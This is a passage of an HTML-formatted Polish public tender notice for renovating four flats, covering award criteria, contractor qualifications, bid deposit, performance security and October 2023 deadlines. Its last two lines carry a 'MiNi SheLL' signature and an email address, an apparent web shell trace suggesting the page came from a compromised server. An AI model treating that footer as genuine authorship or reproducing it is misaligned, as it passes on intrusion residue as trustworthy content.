oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.3	Część III zamówienia:<br/>L.p.	Adres lokalu<br/>1 Lokal mieszkalny położony w budynku mieszkalnym przy<br/> ul. Bagno 3 m 45 o powierzchni użytkowej 20,13 m2<br/>Remont kompleksowy<br/>2	Lokal mieszkalny położony w budynku mieszkalnym przy<br/> ul. Dynasy 10 m 11 o powierzchni użytkowej 17,85 m2<br/>Remont kompleksowy<br/>3	Lokal mieszkalny położony w budynku mieszkalnym przy <br/>ul. Jasna 7 m.95 o powierzchni użytkowej 22,84 m2<br/>Remont kompleksowy<br/>4	Lokal mieszkalny położony w budynku mieszkalnym przy<br/> ul. Marszałkowska 34/50 m 38 o powierzchni użytkowej 17,98 m2<br/>Remont kompleksowy<br/><br/>Wspólny Słownik Zamówień : <br/>Kod CPV45211341-1 Remont lokali mieszkalnych<br/> 45440000-3 - Roboty malarskie i szklarskie<br/>45430000-0 - Pokrywanie podłóg i ścian<br/>45420000-7 - Roboty w zakresie zakładania stolarki budowlanej <br/>45332000-3 - Roboty instalacyjne wodne i kanalizacyjne<br/>45311200-2 - Roboty w zakresie instalacji elektrycznych<br/>1.3.1	Przedmiot postępowania dla III części zamówienia obejmuje wykonanie następujących robót budowlanych:<br/>h)	roboty rozbiórkowe<br/>i)	wymiana stolarki okiennej,<br/>j)	wymiana stolarki drzwiowej,<br/>k)	Wymiana posadzek,<br/>l)	roboty murowe i tynkarskie,<br/>m)	roboty glazurnicze,<br/>n)	roboty malarskie.<br/>1.3.2	W zakres podstawowych robót sanitarnych wchodzą nw. roboty:<br/>f)	demontaż urządzeń sanitarnych,<br/>g)	wymiana osprzętu,<br/>h)	roboty instalacyjne,<br/>i)	roboty hydrauliczne,<br/>j)	pomiary szczelności instalacji.<br/>1.3.3	W zakres podstawowych robót elektrycznych wchodzą nw. roboty :<br/>f)	wymiana instalacji elektrycznej,<br/>g)	wymiana osprzętu elektrycznego,<br/>h)	wymiana tablic,<br/>i)	pomiary elektryczne,<br/>j)	sporządzenie dokumentacji dla zakładu energetycznego.<br/><br/>1.3.4	Inne roboty towarzyszące, związane z technologią poszczególnych branż robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45211340-4 - Roboty budowlane w zakresie budownictwa wielorodzinnego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena oferty brutto ( C ) - waga kryterium – 60% <br/>2) okres gwarancji ( G) – waga kryterium - 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: <br/>1.1	nie podlegają wykluczeniu z postępowania;<br/>1.2	spełniają warunki udziału w postępowaniu dotyczące:<br/>1.2.1	zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie określa szczegółowego warunku w tym zakresie;<br/><br/>1.2.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/> Zamawiający nie określa szczegółowego warunku w tym zakresie;<br/><br/>1.2.3	sytuacji ekonomicznej lub finansowej<br/><br/>Określenie warunków dla części I zamówienia:<br/><br/>Wykonawca spełni warunek jeśli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 250 000,00 zł.<br/><br/>Określenie warunków dla części II zamówienia:<br/><br/>Wykonawca spełni warunek jeśli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 250 000,00 zł.<br/><br/>Określenie warunków dla części III zamówienia:<br/><br/>Wykonawca spełni warunek jeśli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 250 000,00 zł.<br/><br/><br/>1.2.4	zdolności technicznej lub zawodowej<br/><br/>Określenie warunków dla części I zamówienia :<br/><br/>1.2.4.1 wymagane jest posiadanie doświadczenia, tj. warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał nie mniej niż dwie roboty budowlane, o wartości nie mniejszej niż 250 000 zł brutto każda oraz przedstawi dowody, że roboty te zostały wykonane należycie,<br/><br/>Określenie warunków dla części II zamówienia :<br/><br/>wymagane jest posiadanie doświadczenia, tj. warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał nie mniej niż dwie roboty budowlane, o wartości nie mniejszej niż 250 000 zł brutto każda oraz przedstawi dowody, że roboty te zostały wykonane należycie,<br/><br/>Określenie warunków dla części III zamówienia :<br/><br/>wymagane jest posiadanie doświadczenia, tj. warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał nie mniej niż dwie roboty budowlane, o wartości nie mniejszej niż 250 000 zł brutto każda oraz przedstawi dowody, że roboty te zostały wykonane należycie,<br/><br/><br/>1.2.4.2 wymagane jest dysponowanie minimum 1 osobą, która będzie brała udział <br/>w realizacji zamówienia, posiadającą uprawnienia do kierowania robotami <br/>z uprawnieniami konstrukcyjno-budowlanymi zgodnie z wymaganiami ustawy Prawo budowlane lub odpowiadające im równoważne uprawnienia w tej specjalności, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/><br/>Uwaga. Jeżeli Wykonawca będzie składał ofertę na jedną lub dwie część lub całość zamówienia , spełni warunek jeśli wykaże, że dysponuje minimum jedną osobą posiadającą wskazane uprawnienia: <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/>z przedmiotem zamówienia na sumę gwarancyjną określoną w Rozdziale VIII ust. 1 pkt 1.2.3 SWZ tj. kwoty 250 000,00 zł – w odniesieniu do części I, 250 000,00 <br/>w odniesieniu do części II, 250 000,00 w odniesieniu do części III osobno ; <br/>2)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, <br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy roboty budowlane zostały wykonane należycie - w odniesieniu do części I, w doniesieniu do części II w doniesieniu do części III osobno – wzór wykazu określa załącznik nr 4 do SWZ. Dowodami o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów- inne odpowiednie dokumenty; powyższe dokumenty mają potwierdzić spełnienie wymagań w zakresie zdolności technicznej lub zawodowej opisanej w Rozdziale VIII ust.1 pkt. 1.2.4.1 SWZ;<br/>3)	wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz <br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia niezbędnego do wykonania zamówienia publicznego, a także zakresu wykonanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – wzór wykazu określa załącznik nr 5 do SWZ; dokumenty mają potwierdzać spełnienie wymagań określonych w Rozdziale VIII ust. 1 pkt 1.2.4.2 SWZ.<br/>3. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia należy przekazać Zamawiającemu przy użyciu środków komunikacji elektronicznej dopuszczonej w SWZ <br/>w zakresie i w sposobie określonym w przepisach rozporządzenia wydanego na podstawie art. 70 ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 3 do SWZ;<br/>2)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Do oferty, która stanowi załącznik nr 1 do SWZ, Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału <br/>w postępowaniu oraz o braku podstaw do wykluczenia z postępowania o którym mowa <br/>w art. 125 ust. 1 ustawy Pzp - wzór oświadczenia określa załącznik nr 2A do SWZ. Wskazane oświadczenie stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnienia warunków udziału w postępowaniu, odpowiednio na dzień składania ofert.<br/>2)	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, <br/>o którym mowa w ust. 1, (załącznik nr 2A do SWZ) składa każdy z wykonawców ubiegających się o zamówienie. Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy <br/>z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w pkt 1 powyżej, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału <br/>w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby (załącznik nr 2B do SWZ).<br/>4)	Zamawiający wymaga aby Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, zobowiązany jest podać taką informację w formularzu oferty wraz z podaniem zakresu zamówienia, jakie zamierza powierzyć podwykonawcom oraz nazwy podwykonawców. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga od Wykonawców wniesienia wadium: w wysokości 3 000 zł (słownie: trzy tysiące zł), na każdą część zamówienia osobno.<br/>2.	Wadium wnosi się przed upływem terminu składania ofert, tj. do dnia 24.10.2023 r. do godz. 09:30 i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp. <br/>3.	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach: <br/>1)	pieniądzu; <br/>2)	gwarancjach bankowych; <br/>3)	gwarancjach ubezpieczeniowych; <br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz.U. z 2020 r. poz. 299 z późn. zm.). <br/>4.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: 68 1030 1508 0000 0005 5118 0005 ze wskazaniem której części zamówienia wadium dotyczy. <br/><br/>Uwaga:<br/>Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku Zamawiającego.<br/><br/>5.	Dowód wniesienia wadium w pieniądzu musi zawierać w rubryce „tytułem” sformułowanie ze zwrotem „wadium w sprawie nr WCI.ZP.26.2.15.2023” oraz wskazanie której części zamówienia wadium dotyczy. <br/><br/>Uwaga! <br/>Z treści gwarancji lub poręczenia, o których mowa w ust. 3 pkt 2–4, musi jednoznacznie wynikać nieodwoływalne i bezwarunkowe, na każde żądanie zgłoszone przez Zamawiającego, zobowiązanie gwaranta (poręczyciela) do zapłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 ustawy Pzp. <br/>Ponadto powinien być wskazany termin obowiązywania gwarancji (poręczenia), który nie może być krótszy niż termin związania ofertą.<br/><br/>6.	W przypadku wnoszenia wadium w pieniądzu, Zamawiający uzna je za wniesione skutecznie jedynie w przypadku wpływu pieniędzy na rachunek bankowy Zamawiającego przed upływem terminu na składanie ofert. <br/>7.	Zamawiający zwraca Wykonawcom wadium na zasadach określonych w art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy (zwanego dalej „Zabezpieczeniem”) dla każdej części zamówienia osobno na pokrycie roszczeń <br/>z tytułu niewykonania lub nienależytego wykonania umowy.<br/>2.	Zabezpieczenie ustala się w wysokości 5 % ceny całkowitej podanej w ofercie, dla tej części zamówienia, której oferta dotyczy. <br/>3.	Zabezpieczenie może być wniesione, według wyboru Wykonawcy, w jednej lub w kilku następujących formach: <br/>1)	pieniądzu; <br/>2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym; <br/>3)	gwarancjach bankowych; <br/>4)	gwarancjach ubezpieczeniowych; <br/>5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4.	Zamawiający nie wyraża zgody na wniesienie zabezpieczenia:<br/>1)	w wekslach z poręczeniem wekslowym banku lub spółdzielczej kasy oszczędnościowo-kredytowej;<br/>2)	przez ustanowienie zastawu na papierach wartościowych emitowanych przez Skarb Państwa lub jednostkę samorządu terytorialnego;<br/>3)	przez ustanowienie zastawu rejestrowego na zasadach określonych w ustawie z dnia 6 grudnia 1996 r. o zastawie rejestrowym i rejestrze zastawów.<br/>5.	Zabezpieczenie wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy Zamawiającego: 68 1030 1508 0000 0005 5118 0005 <br/>6.	W przypadku wniesienia wadium w pieniądzu Wykonawca może wyrazić zgodę na zaliczenie kwoty wadium na poczet zabezpieczenia.<br/>7.	Jeżeli zabezpieczenie wniesiono w pieniądzu, Zamawiający przechowuje je na oprocentowanym rachunku bankowym. Zamawiający zwraca zabezpieczenie wniesione w pieniądzu z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszt prowadzenia tego rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy Wykonawcy.<br/>8.	W trakcie realizacji umowy Wykonawca może dokonać zmiany formy zabezpieczenia na jedną lub kilka form, o których mowa w ust. 3 powyżej. Zmiana formy zabezpieczenia jest dokonywana z zachowaniem ciągłości zabezpieczenia i bez zmniejszenia jej wysokości.<br/>9.	Z treści zabezpieczenia przedstawionego w formie gwarancji/poręczenia powinno wynikać, iż bank, ubezpieczyciel, poręczyciel zapłaci na rzecz Zamawiającego w terminie maksymalnie 30 dni od pisemnego żądania kwotę zabezpieczenia, na pierwsze wezwanie Zamawiającego, bez odwołania bez warunku, niezależnie od kwestionowania czy zastrzeżeń Wykonawcy i bez dochodzenia czy wezwanie Zamawiającego jest uzasadnione czy nie.<br/>10.	Zamawiający dokona zwrotu zabezpieczenia należytego wykonania umowy w następujący sposób:<br/>1)	70% wartości zabezpieczenia zostanie zwrócone w terminie 30 dni od dnia wykonania zamówienia i uznania przez Zamawiającego za należycie wykonane;<br/>2)	30% wartości zabezpieczenia Zamawiający pozostawi na zabezpieczenie roszczeń z tytułu rękojmi za wady lub gwarancji – kwota ta zostanie zwrócona nie później niż w 15 dniu po upływie okresu rękojmi za wady lub gwarancji. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 4.	Zamawiający przewiduje możliwość zmiany umowy. Postanowienia dotyczące dopuszczalnych zmian umowy, zostały określone w projekcie umowy stanowiącym załącznik nr 6 do SWZ oraz w art. 455 ust. 1 pkt 2, 3, 4 ustawy oraz art. 455 ust. 2 ustawy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-25 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Oferty należy złożyć za pośrednictwem Platformy pod adresem: https://platforma.eb2b.com.pl lub wci.eb2b.com.pl przy użyciu zakładki „Załączniki” w terminie do dnia 24.10.2023 r. do godziny 09:30.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-25 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com